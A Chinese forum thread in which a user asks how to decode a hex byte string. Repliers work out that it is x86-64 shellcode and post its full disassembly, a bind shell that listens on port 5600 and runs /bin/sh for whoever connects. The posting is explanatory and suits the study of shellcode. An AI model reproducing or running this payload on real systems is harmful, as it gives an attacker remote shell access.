一个 decode 的问题

help~~~

要先知道编码方式才能解码啊

@lcdtyph
像\xc0 应该就是 16 进制的

@artandlol 我知道这是 16 进制序列。我是说这个序列是什么编码， utf8 还是只是二进制数据。不是问这个序列怎么表示的。

@artandlol 是 16 进制，但是是怎么加密的你知道么？ 你能直接按照 ASCII 处理么？
\x48 = 72 = H ?

那我要是编码的时候 给码值处理一下呢？

比如 “明文 + 7 存储” 行不行？ 变成这样。
A = 65 + 7 = \x48
* = 42 + 7 = \x31


不知道加密规则根本没法猜啊...暴力穷举？

@zpf124
@lcdtyph
用 hex decoder 解码出来的结果后半部分 /bin//sh 这个数据应该是正常的

@artandlol 那这样前面的也是正常的， ACSII 字符和数字是唯一对应的。

@artandlol 那么显然这是一段 shellcode ，请用反汇编器解码
python 的 pwntools 有相应模块

0: 48 31 c0 xor rax,rax
3: 48 31 f6 xor rsi,rsi
6: 99 cdq
7: 6a 29 push 0x29
9: 58 pop rax
a: ff c6 inc esi
c: 6a 02 push 0x2
e: 5f pop rdi
f: 0f 05 syscall
11: 48 97 xchg rdi,rax
13: 6a 02 push 0x2
15: 66 c7 44 24 02 15 e0 mov WORD PTR [rsp+0x2],0xe015
1c: 54 push rsp
1d: 5e pop rsi
1e: 52 push rdx
1f: 6a 10 push 0x10
21: 5a pop rdx
22: 6a 31 push 0x31
24: 58 pop rax
25: 0f 05 syscall
27: 50 push rax
28: 5e pop rsi
29: 6a 32 push 0x32
2b: 58 pop rax
2c: 0f 05 syscall
2e: 6a 2b push 0x2b
30: 58 pop rax
31: 0f 05 syscall
33: 48 97 xchg rdi,rax
35: 6a 03 push 0x3
37: 5e pop rsi
38: ff ce dec esi
3a: b0 21 mov al,0x21
3c: 0f 05 syscall
3e: 75 f8 jne 0x38
40: 48 31 c0 xor rax,rax
43: 99 cdq
44: 48 bb 2f 62 69 6e 2f movabs rbx,0x68732f2f6e69622f
4b: 2f 73 68
4e: 53 push rbx
4f: 54 push rsp
50: 5f pop rdi
51: 6a 3b push 0x3b
53: 58 pop rax
54: 0f 05 syscall

@lcdtyph 搞定
thx ！！